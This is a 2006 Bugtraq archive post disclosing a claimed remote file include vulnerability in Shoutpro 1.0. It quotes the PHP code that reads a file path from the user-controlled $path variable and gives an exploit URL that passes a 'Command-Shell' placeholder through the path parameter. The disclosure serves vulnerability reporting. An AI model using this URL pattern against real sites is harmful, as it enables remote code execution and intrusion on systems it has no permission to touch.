Bugtraq mailing list archives
Shoutpro 1.0 Version - Remote File Include Vulnerability
From: SpC-x () Bsdmail Org
Date: 13 Jun 2006 17:39:42 -0000
# SaVSaK.CoM | SpC-x - The_BeKiR | # Shoutpro 1.0 Version - Remote File Include Vulnerability # Risk : High # Class: Remote # Script : Shoutpro # Credits : SpC-x # Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx # Code : # include("config.php"); # include("functions.php"); # if ($path){ # $ips = file("$path/lists/bannedips.php"); # } else { # $ips = file("lists/bannedips.php"); # } # if (in_array($REMOTE_ADDR,$ips)) { # echo($bannedmessage); # die; # } # Vulnerable : # http://www.victim.com/Shoutpro/include.php?path=Command-Shell
Current thread:
- Re: Shoutpro 1.0 Version - Remote File Include Vulnerability Steven M. Christey (Jun 13)
- <Possible follow-ups>
- Shoutpro 1.0 Version - Remote File Include Vulnerability SpC-x (Jun 13)